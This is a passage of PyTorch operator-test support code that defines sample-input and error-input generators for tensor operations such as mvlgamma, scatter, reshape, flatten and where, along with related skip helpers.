List[SampleInput]: if variant == 'variadic': def make_inputs( tensors: List[torch.Tensor]) -> Tuple[Union[torch.Tensor, List[torch.Tensor]], Tuple[torch.Tensor, ...]]: return tensors[0], tuple(tensors[1:]) elif variant == 'list': def make_inputs( tensors: List[torch.Tensor]) -> Tuple[Union[torch.Tensor, List[torch.Tensor]], Tuple[torch.Tensor, ...]]: return tensors, () else: raise ValueError( 'Unsupported variant, must be one of {"variadic", "list"}. ' f'Got "{variant}".') SCALAR = torch.Size([]) VECTOR = torch.Size([3]) test_cases: List[List[torch.Size]] = [ [SCALAR], [VECTOR], [VECTOR, SCALAR], [VECTOR, SCALAR, VECTOR], [VECTOR, SCALAR, VECTOR, SCALAR], ] sample_inputs = [] for shapes, indexing in itertools.product(test_cases, {'xy', 'ij'}): input, args = make_inputs( [make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad) for shape in shapes]) sample_inputs.append(SampleInput(input=input, args=args, kwargs=dict(indexing=indexing))) return sample_inputs def sample_inputs_polygamma(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) tensor_shapes = ((S, S), ()) ns = (1, 2, 3, 4, 5) for shape, n in product(tensor_shapes, ns): yield SampleInput(make_arg(shape), args=(n,)) def sample_inputs_mvlgamma(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) tensor_shapes = ((S, S), ()) ns = (1, 2, 3, 4, 5) # Since the accepted lower bound for input # to mvlgamma depends on `p` argument, # the following function computes the lower bound # which we pass to `make_tensor`. def compute_min_val(p): return (p - 1.) / 2 for shape, n in product(tensor_shapes, ns): min_val = compute_min_val(n) if not dtype.is_floating_point: # Round-up minimum value for integral dtypes min_val += 1 else: min_val += 2 * torch.finfo(dtype).eps yield SampleInput(make_arg(shape, low=min_val), args=(n,)) # Since `mvlgamma` has multiple entries, # there are multiple common skips for the additional # entries. Following function is a helper to that end. def skips_mvlgamma(skip_redundant=False): skips = ( # outside domain values are hard error for mvlgamma op. DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_float_domains'), ) if skip_redundant: # Redundant tests skips = skips + ( # type: ignore[assignment] DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), ) return skips # To test reference numerics against multiple values of argument `p`, # we make multiple OpInfo entries with each entry corresponding to different value of p. # We run the op tests from test_ops.py only for `p=1` to avoid redundancy in testing. # Class `MvlGammaInfo` already contains the basic information related to the operator, # it only takes arguments like `domain`, `skips` and `sample_kwargs`, which # differ between the entries. class MvlGammaInfo(UnaryUfuncInfo): def __init__(self, variant_test_name, domain, skips, sample_kwargs): super(MvlGammaInfo, self).__init__( 'mvlgamma', ref=reference_mvlgamma if TEST_SCIPY else _NOTHING, aliases=('special.multigammaln',), variant_test_name=variant_test_name, domain=domain, decorators=(precisionOverride({torch.float16: 5e-2}),), dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.half), sample_inputs_func=sample_inputs_mvlgamma, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=skips, sample_kwargs=sample_kwargs) def sample_inputs_entr(op_info, device, dtype, requires_grad, **kwargs): low, _ = op_info.domain if requires_grad: low = 0 + op_info._domain_eps return (SampleInput(make_tensor((L,), dtype=dtype, device=device, low=low, requires_grad=requires_grad)), SampleInput(make_tensor((), dtype=dtype, device=device, low=low, requires_grad=requires_grad))) # TODO: Consolidate `i0e` with sample_inputs_unary when `make_tensor`, # supports `exclude` argument. # For more context: https://github.com/pytorch/pytorch/pull/56352#discussion_r633277617 def sample_inputs_i0_i1(op_info, device, dtype, requires_grad, **kwargs): samples = (SampleInput(make_tensor((S,), dtype=dtype, device=device, requires_grad=requires_grad)), SampleInput(make_tensor((), dtype=dtype, device=device, requires_grad=requires_grad))) if requires_grad and op_info.op == torch.special.i0e: # NOTE: `i0e`'s first-order gradient is not continous # at `0`, hence we don't test `i0e` with any input being `0`. # TODO: Remove this when `make_tensor` supports excluding `0`. for sample in samples: t = sample.input t[t == 0] = torch.finfo(dtype).eps # type: ignore[index] elif requires_grad and op_info.op != torch.special.i0e: # Special Case for gradient # Sample with `0` in the input t = make_tensor((S,), dtype=dtype, device=device, requires_grad=requires_grad) t[0] = 0 samples += (SampleInput(t),) # type: ignore[assignment] return samples def sample_inputs_cumulative_ops(op_info, device, dtype, requires_grad, supports_dtype_kwargs=True, **kwargs): def _make_tensor_helper(shape, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) samples = [ SampleInput(_make_tensor_helper((S, S, S)), args=(0,)), SampleInput(_make_tensor_helper((S, S, S)), args=(1,)), SampleInput(_make_tensor_helper(()), args=(0,)), ] if supports_dtype_kwargs: # NOTE: if `dtype` is not same as input, then inplace variants fail with # `provided dtype must match the dtype of self tensor in cumsum` samples.append(SampleInput(_make_tensor_helper((S, S, S)), args=(1,), kwargs={'dtype': dtype})) return samples def sample_inputs_unfold(op_info, device, dtype, requires_grad, **kwargs): test_cases = ( ((), (0, 1, 1)), ((S, S, S, S), (0, 3, 1)), ((S, S, S, S), (1, 3, 1)), ((S, S, S, S), (2, 3, 1)), ((S, S, S, S), (3, 3, 1)), ((S, S, S, S), (0, 3, 2)), ((S, S, S, S), (1, 3, 2)), ((S, S, S, S), (2, 3, 2)), ((S, S, S, S), (3, 3, 2)), ((S, S, S, S), (0, 4, 1)), ((S, S, S, S), (1, 4, 1)), ((S, S, S, S), (2, 4, 1)), ((S, S, S, S), (3, 4, 1)), ((M,), (0, 3, 1)), ((M,), (0, 3, 2)), ((M,), (0, 3, 3)), ((1000,), (0, 3, 11)), ((1000,), (0, 2, 27)), ((10, 10), (0, 1, 2)), ((10, 10), (1, 2, 3)), ((10, 10), (1, 2, 2)), ((S, S, S), (2, 3, 2)), ) sample_inputs = [] for shape, arguments in test_cases: sample_inputs += [SampleInput(make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=arguments)] return sample_inputs def sample_inputs_split(op_info, device, dtype, requires_grad, *, list_args=False, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) if list_args: cases = ( ((S, S, S), ([int(S / 3), S - int(S / 3) * 2, int(S / 3)],)), ((S, S, S), ([int(S / 2), S - int(S / 2) * 2, int(S / 2)], 2),), ((S, S, S), ([int(S / 2), S - int(S / 2) * 2, int(S / 2)], -2),) ) else: cases = ( # type: ignore[assignment] ((S, S, S), (2,)), ((S, S, S), (S, 1)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def sample_inputs_split_with_sizes(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = (((S, S, S), ([int(S / 3), S - int(S / 3) * 2, int(S / 3)],)), ((S, S, S), ([int(S / 3), S - int(S / 3), 0],)), ((S, S, S), ([int(S / 3), S - int(S / 3) * 2, int(S / 3)], 2)), ((S, S, S), ([int(S / 3), S - int(S / 3) * 2, int(S / 3)], -2)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def sample_inputs_msort(op_info, device, dtype, requires_grad, **kwargs): def apply_grad(t): if dtype in floating_types_and(torch.float16, torch.bfloat16): t.requires_grad_(requires_grad) def large_1d_unique(dtype, device): res = torch.randperm(L * L * L, dtype=torch.int64, device=device) res = res.to(dtype) apply_grad(res) return res samples = [] # Test case for large tensor. largesample = SampleInput(large_1d_unique(dtype, device)) sample = SampleInput(make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)) return [largesample, sample] def sample_inputs_lerp(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) samples = ( # no broadcast SampleInput(make_arg((S, S)), args=(make_arg((S, S)), 0.4)), # broadcast rhs SampleInput(make_arg((S, S)), args=(make_arg((S,)), 0.4)), # scalar tensor SampleInput(make_arg(()), args=(make_arg(()), 0.4)), # broadcast rhs scalar-tensor SampleInput(make_arg((S, S)), args=(make_arg(()), 0.4)), # broadcast rhs with weight tensor SampleInput(make_arg((S, S)), args=(make_arg((S,)), make_arg((S, S)))), # broadcast rhs and weight tensor SampleInput(make_arg((S, S)), args=(make_arg((S, 1)), make_arg((S,)))), # broadcast lhs SampleInput(make_arg((S,)), args=(make_arg((S, S)), 0.4), broadcasts_input=True), # scalar broadcast_lhs SampleInput(make_arg(()), args=(make_arg((S, S)), 0.4), broadcasts_input=True), # broadcast all SampleInput(make_arg((S, 1)), args=(make_arg((S, S)), 0.4), broadcasts_input=True), # tensor broadcast all SampleInput(make_arg((S, 1)), args=(make_arg((S, S)), make_arg((S, 1))), broadcasts_input=True), # no broadcast with weight tensor SampleInput(make_arg((S, S)), args=(make_arg((S, S)), make_arg((S, S)))), # broadcast lhs with weight tensor SampleInput(make_arg((S,)), args=(make_arg((S, S)), make_arg((S, S))), broadcasts_input=True), # broadcast lhs and weight tensor SampleInput(make_arg((S,)), args=(make_arg((S, S, S)), make_arg((S, S))), broadcasts_input=True), # broadcast lhs and weight tensor variant SampleInput(make_arg((S, S)), args=(make_arg((S, S, S)), make_arg((S,))), broadcasts_input=True), ) if dtype.is_complex: samples = samples + ( # type: ignore[assignment] # no broadcast SampleInput(make_arg((S, S)), args=(make_arg((S, S)), 0.4j)), SampleInput(make_arg((S, S)), args=(make_arg((S, S)), 1.2 + 0.1j)), # broadcast rhs SampleInput(make_arg((S, S)), args=(make_arg((S,)), 0.4j)), SampleInput(make_arg((S, S)), args=(make_arg((S, S)), 5.4 + 9j)), # scalar tensor SampleInput(make_arg(()), args=(make_arg(()), 0.4j)), SampleInput(make_arg(()), args=(make_arg(()), 6.1 + 0.004j)), # broadcast rhs scalar-tensor SampleInput(make_arg((S, S)), args=(make_arg(()), 0.4j)), SampleInput(make_arg((S, S)), args=(make_arg(()), 1 + 2j)), ) return samples def sample_inputs_tensordot(self, device, dtype, requires_grad, **kwargs): cases = ( ((2, 2, 2), (2, 2, 2), (2)), ((2, 2, 1), (2, 1, 2), ([0, 1], [2, 0])), ) samples = [] for first_shape, second_shape, dims in cases: samples.append(SampleInput(make_tensor(first_shape, dtype=dtype, device=device, requires_grad=requires_grad), args=(make_tensor(second_shape, dtype=dtype, device=device, requires_grad=requires_grad),), kwargs=dict(dims=dims,))) return tuple(samples) def sample_inputs_kron(op_info, device, dtype, requires_grad, **kwargs): test_cases = ( ((S, S), (M, L)), ) sample_inputs = [] for input_shape, other_shape in test_cases: input = make_tensor(input_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) other = make_tensor(other_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) sample = SampleInput(input, args=(other,)) sample_inputs.append(sample) return tuple(sample_inputs) def sample_inputs_inner(self, device, dtype, requires_grad, **kwargs): return ( SampleInput( make_tensor((S, ), dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, requires_grad=requires_grad), ) ), SampleInput( make_tensor((), dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), ) ), ) def sample_inputs_scatter(op_info, device, dtype, requires_grad, **kwargs): def _tensor(shape, dtype=dtype, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) def _gather(shape, index_dim, max_indices): return gather_variable(shape, index_dim, max_indices, device=device) zero = torch.tensor(0, dtype=torch.long, device=device) test_cases = ( (_tensor((M, S)), (0, _gather((S, S), 1, M), _tensor((S, S)))), (_tensor((M, S)), (1, _gather((S, S), 0, S), _tensor((S, S)))), (_tensor((M, S)), (-1, _gather((S, S), 0, S), _tensor((S, S)))), (_tensor((M, S)), (0, _gather((M, S // 2), 1, M), _tensor((M, S // 2)))), (_tensor((M, S)), (1, _gather((M, S // 2), 0, S), _tensor((M, S // 2)))), (_tensor((M, S)), (-1, _gather((M, S // 2), 0, S), _tensor((M, S // 2)))), (_tensor(()), (0, zero.clone().detach(), _tensor(()))), (_tensor(()), (0, zero.clone().detach(), 2.5)), ) samples = [] for tensor, args in test_cases: samples.append(SampleInput(tensor, args=args)) if not requires_grad: samples.append(SampleInput( tensor.clone().detach(), args=args, kwargs={'reduce': 'add'} )) if dtype.is_floating_point: samples.append(SampleInput( tensor.clone().detach(), args=args, kwargs={'reduce': 'multiply'} )) return samples def sample_inputs_scatter_add(op_info, device, dtype, requires_grad, **kwargs): def _tensor(shape, dtype=dtype, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) def _gather(shape, index_dim, max_indices): return gather_variable(shape, index_dim, max_indices, device=device) zero = torch.tensor(0, dtype=torch.long, device=device) test_cases = ( (_tensor((M, S)), (0, _gather((S, S), 1, M), _tensor((S, S)))), (_tensor((M, S)), (1, _gather((S, S), 0, S), _tensor((S, S)))), (_tensor((M, S)), (-1, _gather((S, S), 0, S), _tensor((S, S)))), (_tensor((M, S)), (0, _gather((M, S // 2), 1, M), _tensor((M, S // 2)))), (_tensor((M, S)), (1, _gather((M, S // 2), 0, S), _tensor((M, S // 2)))), (_tensor((M, S)), (-1, _gather((M, S // 2), 0, S), _tensor((M, S // 2)))), (_tensor(()), (0, zero.clone().detach(), _tensor(()))), ) return [SampleInput(tensor, args=args) for tensor, args in test_cases] def sample_inputs_scatter_reduce(op_info, device, dtype, requires_grad, **kwargs): def _tensor(shape, dtype=dtype, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) def _gather(shape, index_dim, max_indices): return gather_variable(shape, index_dim, max_indices, device=device) zero = torch.tensor(0, dtype=torch.long, device=device) test_cases = ( ((M, S), 0, _gather((S, S), 1, M), (S, S)), ((M, S), 1, _gather((S, S), 0, S), (S, S)), ((M, S), -1, _gather((S, S), 0, S), (S, S)), ((M, S), 0, _gather((M, S // 2), 1, M), (M, S // 2)), ((M, S), 1, _gather((M, S // 2), 0, S), (M, S // 2)), ((M, S), -1, _gather((M, S // 2), 0, S), (M, S // 2)), ((), 0, zero.clone().detach(), ()), ) reduce = op_info.variant_test_name for args, include_self in product(test_cases, [True, False]): inp_shape, dim, index, src_shape = args yield SampleInput(_tensor(inp_shape), args=(dim, index, _tensor(src_shape), reduce), kwargs={'include_self': include_self}) # Sample inputs to test edge cases for backward # Check that gradients are propagated correctly for prod when zeros in self/src are reduced if requires_grad and reduce == 'prod': # This sample tests gradients for the following cases # (a) 1 zero reduced (from src (self[0, 1], self[1, 1]), from self (self[0, 0], self[2, 0])) # (b) 2 zeros reduced (1 from src and 1 from self (self[1, 0]) # (c) no zeros reduced (self([2, 1])) # (d) 2 zeros reduced (both from src) is tested in test/test_autograd.py # test_scatter_index_reduce_prod_gradgrad_error as this case is not supported for gradgrad input = torch.tensor([[0, 13], [0, 17], [0, 19]], dtype=dtype, device=device, requires_grad=requires_grad) src = torch.tensor([[0, 1, 2, 3], [0, 4, 0, 1], [2, 3, 5, 6]], dtype=dtype, device=device, requires_grad=requires_grad) idx = torch.tensor([[1, 1, 0, 0], [0, 0, 1, 1], [0, 0, 0, 1]], dtype=torch.long, device=device) yield SampleInput(input, args=(1, idx, src, reduce), kwargs={'include_self': True}) def sample_inputs_ravel(op_info, device, dtype, requires_grad, **kwargs): samples = (SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)), SampleInput(make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)),) return samples def sample_inputs_tril_triu(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((M, M), ()), ((M, M), (2,),), ((S, M, M), ()), ((S, M, M), (2,)), ((3, 3, S, S), ()),) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def sample_inputs_clone(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(make_arg((S, M, S))) yield SampleInput(make_arg(())) def reference_inputs_clone(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_clone(op, device, dtype, requires_grad, **kwargs) shapes = ( (3, 5, 6), (1, 1, 3, 5, 6), (1, 1, 3, 5, 6, 1, 1), (1, 0, 3, 5, 0, 2), (1, 0, 3, 5, 0, 0, 1, 1, 2), (), ) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for shape in shapes: yield SampleInput(make_arg(shape)) yield SampleInput(make_arg(shape).transpose(0, -1)) yield SampleInput(make_arg(shape, noncontiguous=True)) yield SampleInput(make_arg(shape, noncontiguous=True).transpose(0, -1)) # shape, strides, offset strided_cases = ( ((5, 6, 2), (1, 1, 7), 2), ((5, 5, 4), (1, 1, 7), 2), ((5, 5, 2), (4, 5, 7), 3), ((5, 5, 2), (5, 5, 7), 3), ((5, 5, 2), (5, 5, 5), 3), ((9, 5, 2), (0, 1, 7), 3), ) for shape, strides, offset in strided_cases: yield SampleInput(make_arg(500,).as_strided(shape, strides, offset)) def sample_inputs_contiguous(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(make_arg((S, S))) def sample_inputs_sum_to_size(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) # list of tuples (shape, shape) defining the shapes of the input and output tensors sample_shapes = [ ((), ()), ((S), (1)), ((S, S), (1, 1)), ((S, S), (1, S)), ((S, S), (S, S)), ((S, S, S), (S, 1, S)), ] samples = [] for input_shape, output_shape in sample_shapes: input_t = make_arg(input_shape) samples.append(SampleInput(input_t, args=(output_shape,))) return samples def sample_inputs_resize_ops(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device) cases = (((S, S, S), (S * S, S)), ((), ()), ((), (1, 1, 1)), ) for shape, args_or_shape in cases: # Update `args` based on operator if op_info.name == 'resize_': # resize_ takes shape/tuple of ints, args = (args_or_shape, ) elif op_info.name == 'resize_as_': # resize_as_ takes another tensor args = (make_arg(shape, requires_grad=False), ) # type:ignore[assignment] else: raise ValueError("sample_inputs_resize_ops is being used with incorrect operator") yield(SampleInput(make_arg(shape, requires_grad=requires_grad), args=args)) def sample_inputs_view_reshape(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = ( ((S, S, S), (S * S, S)), ((S * S, S), (S, S, S)), ((S * S, S), (S, -1, S)), ((S * S * 2, S), (S, -1)), ((S,), (S,)), ((), ()), ((), (1,)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=(args,)) if kwargs.get("transpose_samples", False) and len(shape) >= 2: transposed = make_arg(shape).transpose(0, 1).detach().requires_grad_(requires_grad) yield SampleInput(transposed, args=(args,)) def reference_inputs_view_reshape(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_view_reshape(op, device, dtype, requires_grad, **kwargs) cases = ( ((125,), (25, 5)), ((25, 25), (1, 5, 5, 1, 5, 1, 5, 1)), ((16, 32), (2, 4, 1, 4, 4, 1, 4)), ((16, 12), (12, 16)), ((1, 16, 12), (12, 16)), ((1, 5, 1, 5), (25, 1)), ((2, 4, 2), (4, 4)), ((1, 4), (1, 1, 2, 1, 2)), ((3, 5, 7), (7, 5, 3)), ((1,), ()), ((5, 0, 2, 3), (5, 0, 2, 3)), ((2, 1, 0, 3, 1), (5, 0)), ((1,), ()), ((4, 5, 6), (4, 5, 6, 1, 1, 1)), ((), (1, 1, 1, 1)), ) irreversible_cases = ( ((), (-1,)), ((4, 7, 9, 1, 1), (1, 4, 3, -1, 1)), ) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for a, b in cases: yield SampleInput(make_arg(a), args=(b,)) yield SampleInput(make_arg(b), args=(a,)) if kwargs.get("transpose_samples", False): yield SampleInput(make_arg(a, noncontiguous=True).transpose(0, -1), args=(b,)) else: yield SampleInput(make_arg(a, noncontiguous=True), args=(b,)) for a, b in irreversible_cases: yield SampleInput(make_arg(a), args=(b,)) def error_inputs_reshape(op, device, **kwargs): cases = ( # Reshape to different numel ((2,), ()), ((1, 3, 0), ()), ((4, 3), (4, 2)), ((1, 3, 5), (5, 2, 2)), # No valid inference ((1, 3, 5), (5, -1, 2)), # Two inferred shapes ((1, 3, 5), (5, -1, -1)), ((1), (0, -1)), ((0, 5), (0, -1)), ) make_arg = partial(make_tensor, dtype=torch.float32, device=device, requires_grad=False) for a, b in cases: yield ErrorInput(SampleInput(make_arg(a), args=(b,)), error_type=Exception, error_regex="") def sample_inputs_view_as_reshape_as(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device) cases = (((S, S, S), (S * S, S)), ((), ()), ((), (1, 1)), ) for case in cases: shape, shape_other = case inp = make_arg(shape, requires_grad=requires_grad) yield(SampleInput(inp, args=(make_arg(shape_other, requires_grad=False),))) if op_info.name != "view_as" and len(shape) >= 2: yield(SampleInput( inp.clone().transpose(0, 1).requires_grad_(requires_grad), args=(make_arg(shape_other, requires_grad=False),))) def sample_inputs_atleast1d2d3d(op_info, device, dtype, requires_grad, **kwargs): input_list = [] shapes = ((S, S, S, S), (S, S, S), (S, S), (S, ), (),) make_tensor_partial = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) samples = [] for shape in shapes: input_list.append(make_tensor_partial(shape)) samples.append(SampleInput(make_tensor_partial(shape))) samples.append(SampleInput(input_list, )) return samples def sample_inputs_column_stack(op_info, device, dtype, requires_grad, **kwargs): input_list = [] cases: Tuple[tuple, tuple] = ( # type: ignore[assignment] ((S, 2, 1), (S, 3, 1)), ((S), (S, 5)), ((), (1, S)) ) make_tensor_partial = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for shape1, shape2 in cases: input_list.append(SampleInput([make_tensor_partial(shape1), make_tensor_partial(shape2)])) return input_list def sample_inputs_flatten(op_info, device, dtype, requires_grad, **kwargs): samples = [] shapes = ((S, S, S), (S, S), (S, ), (),) make_tensor_partial = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for shape in shapes: samples.append(SampleInput(make_tensor_partial(shape))) if len(shape) > 1: samples.append(SampleInput(make_tensor_partial(shape), kwargs=dict(start_dim=1, end_dim=-1))) return samples def reference_inputs_flatten(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_flatten(op, device, dtype, requires_grad, **kwargs) # shape x start_dim x end_dim cases = ( ((5, 4, 0, 1, 3, 7), 1, 3), ((5, 4, 0, 1, 3, 7), 4, 5), ((5, 4, 1, 1, 3, 7), 2, 3), ((), 0, -1), ((1,), 0, -1), ((3, 7, 5), 1, 2), ((4, 5), 1, 1), ((1, 5, 5, 1, 5, 1, 5, 1), 0, 2), ((1, 5, 5, 1, 5, 1, 5, 1), 3, -1), ((1, 5, 5, 1, 5, 7, 5, 1), -2, -1), ((2, 4, 2), 0, 1), ((4, 2, 2), 1, 2), ((0, 3, 4, 5), 1, 3), ) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for shape, start, end in cases: yield SampleInput(make_arg(shape), args=(start, end,)) yield SampleInput(make_arg(shape, noncontiguous=True).transpose(0, -1), args=(start, end,)) yield SampleInput(make_arg(shape).transpose(0, -1), args=(start, end,)) def sample_inputs_select(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((S, S, S), (1, 2)), ((S, S, S), (-1, 2)), ((S, S, S), (-1, -1)), ((S, S, S), (1, -1)), ((S,), (0, 2)) ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def sample_inputs_select_scatter(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((S, S, S), (S, S), (1, 2)), ((S, S, S), (S, S), (-1, 2)), ((S, S, S), (S, S), (-1, -1)), ((S, S, S), (S, S), (1, -1)), ((S,), (), (0, 2)) ) for input_shape, src_shape, args in cases: input_ = make_arg(input_shape) src = make_arg(src_shape) yield SampleInput(input_, args=(src, *args)) def sample_inputs_slice_scatter(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((L, L, L), (L, L, L,), (0, 0, L, 1)), ((L, L, L), (L // 2, L, L,), (0, L // 2, L, 1)), ((L, L, L), (L // 4, L, L,), (0, L // 2, L, 2)), ((L, L, L), (L, L, L,), (1, 0, L, 1)), ((L, L, L), (L, L // 2, L,), (1, L // 2, L, 1)), ((L, L, L), (L, L // 4, L,), (1, L // 2, L, 2)), ((L, L, L), (L, L, L,), (2, 0, L, 1)), ((L, L, L), (L, L, L // 2,), (2, L // 2, L, 1)), ((L, L, L), (L, L, L // 4,), (2, L // 2, L, 2)), ) for input_shape, src_shape, args in cases: input_ = make_arg(input_shape) src = make_arg(src_shape) yield SampleInput(input_, args=(src, *args)) def sample_inputs_expand(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((S, 1, 1), (S, S, S)), ((S, 1, S), (S, S, S)), ((S, 1, S), (-1, S, -1)), ((S, 1, S), (-1, S, S)), ((S, 1), (S, S, S)), ((1,), (S, S, S)), ((1, S), (1, 1, S)), ((), ()), ((), (1, 3, 2)), ) for case in cases: shape, args = case yield(SampleInput(make_arg(shape), args=(args, ))) def sample_inputs_conversion(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) shapes = ((), (2, 3)) memory_format_options = [None, torch.contiguous_format] for shape, memory_format in itertools.product(shapes, memory_format_options): yield SampleInput(make_arg(shape), kwargs={'memory_format': memory_format} if memory_format else {}) yield SampleInput(make_arg((2, 3, 2, 3)), kwargs={'memory_format': torch.channels_last}) def sample_inputs_expand_as(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device) cases = (((S, 1, 1), (S, S, S)), ((), ()), ((), (1, 1)), ) for shape, shape_other in cases: yield(SampleInput(make_arg(shape, requires_grad=requires_grad), args=(make_arg(shape_other, requires_grad=False), ))) def sample_inputs_where(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) def make_bool_mask(shape): # Make sure atleast one element is nonzero, # except for empty tensor mask_t = make_tensor(shape, dtype=torch.bool, device=device, requires_grad=False) if mask_t.numel() == 0: return mask_t elif mask_t.numel() == 1: mask_t.fill_(True) return mask_t if mask_t.sum() == 0: def random_index(shape): return tuple(map(lambda max_idx: random.randint(0, max_idx), shape)) mask_t[random_index(mask_t.shape)] = True return mask_t return mask_t cases = (((M, M), (M, M), (M, M), False), ((M, 1, M), (M, M), (M, M, 1), True), ((), (), (), False), ((M, 1, M), (), (M, M, 1), True), ((), (M, M), (), True),) for shape, mask_shape, other_shape, broadcasts_input in cases: yield SampleInput(make_arg(shape), args=(make_bool_mask(mask_shape), make_arg(other_shape)), broadcasts_input=broadcasts_input) # TODO: add reference inputs for where(condition) signature def reference_inputs_where(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_where(op, device, dtype, requires_grad, **kwargs) make_cond = partial(make_tensor, dtype=torch.bool, device=device, requires_grad=requires_grad) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) # noncontiguous c = make_cond((10, 3), noncontiguous=True) a = make_arg((10, 1), noncontiguous=True) b = make_arg((3, 10, 3)).transpose(0, -1) # NOTE that the OpInfo for where takes samples of the form a, cond, b yield SampleInput(a, args=(c, b)) # type promoting other_dtype = torch.double if dtype is not torch.double else torch.long c = make_cond((10, 3), noncontiguous=True) a = make_arg((10, 1), dtype=torch.long) b = make_arg((10, 1)) yield SampleInput(a, args=(c, b)) # NaN propagation if dtype.is_floating_point or dtype.is_complex: if dtype.is_floating_point: nan = float('nan') else: # dtype.is_complex nan = complex(float('nan'), float('nan')) c = make_cond((1, 10, 3)) a = make_arg((10, 3), noncontiguous=True) a[2, 1] = nan b = make_arg((1, 3)) b[0, 2] = nan yield SampleInput(a, args=(c, b)) def error_inputs_where(op_info, device, **kwargs): shape = (S,) err_msg = "Expected all tensors to be on the same device" for devices in product(('cpu', device), repeat=3): if len(set(devices)) == 2: si = SampleInput(make_tensor(shape, device=devices[0], dtype=torch.float32), args=(make_tensor(shape, dtype=torch.bool, device=devices[1]), make_tensor(shape, device=devices[2], dtype=torch.float32))) yield ErrorInput(si, error_regex=err_msg) def sample_inputs_nonzero(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S)) inputs = [] for shape in sizes: # construct input without any non-zero elements zeros = torch.zeros(shape, dtype=dtype, device=device, requires_grad=requires_grad) inputs.append(zeros) # construct input with mixed zero and non-zero elements mixed = make_arg(shape).requires_grad_(False) mask_t = make_tensor(shape, dtype=torch.bool, device=device, requires_grad=False) mixed[mask_t] = 0 inputs.append(mixed) for input_t, as_tuple in product(inputs, [False, True]): yield(SampleInput(input_t.clone().requires_grad_(requires_grad), kwargs=dict(as_tuple=as_tuple))) def sample_inputs_chunk(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((S, S, S), 